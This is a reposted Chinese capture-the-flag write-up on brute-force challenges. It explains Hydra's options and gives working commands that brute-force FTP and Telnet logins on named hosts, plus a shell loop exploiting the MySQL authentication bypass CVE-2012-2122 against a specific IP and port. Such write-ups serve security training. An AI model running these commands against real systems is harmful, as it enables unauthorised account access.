碼上快樂

相關內容    簡體    繁體

暴力破解 安鸞 Writeup

本文轉載自   查看原文   2021-08-14 12:11   209    CTF/ wp/ 安鸞 
D:\soft\hydra-windows>hydra.exe
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
通用:hydra <參數> <IP地址> <服務名>

Options(參數選項):
-R 繼續從上一次進度接着破解。
-S 采用SSL鏈接。
-s PORT 可通過這個參數指定非默認端口。
-l LOGIN 指定破解的用戶,對特定用戶破解。
-L FILE 指定用戶名字典。
-p PASS 小寫,指定密碼破解,少用,一般是采用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。
-C FILE 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P參數。
-M FILE 指定目標列表文件一行一條。
-o FILE 指定結果輸出文件。
-f 在使用-M參數以后,找到第一對登錄名或者密碼的時候中止破解。
-t TASKS 同時運行的線程數,默認為16。
-w TIME 設置最大超時的時間,單位秒,默認是30s。
-v / -V 顯示詳細過程。
server 目標ip
service 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

推薦一份 爆破賬戶密碼字典

  • ftp服務破解
    IP:118.190.133.35
    hydra -L Ftp/Username.txt -P top100pass.txt ftp://118.190.133.35

  • telnet服務破解
    domain:
    www.whalwl.icu
    port:
    2323
    hydra -L Telnet/Username.txt -P top100password.txt telnet://www.whalwl.icu:2323/

  • Mysql暴力破解
    IP:118.190.133.35
    PORT:3308
    Mysql 身份認證繞過漏洞(CVE-2012-2122)
    當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。按照公告說法大約256次就能夠蒙對一次。

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 118.190.133.35 -P3308 ; done


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 文件上傳 安鸞 Writeup 命令執行 安鸞 Writeup 安鸞CTF Writeup SSRF02 安鸞CTF Writeup wordpress 01 安鸞CTF Writeup SSRF03 SMTP暴力破解 暴力破解 如何防暴力破解?? 暴力破解 暴力破解UltraEdit
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM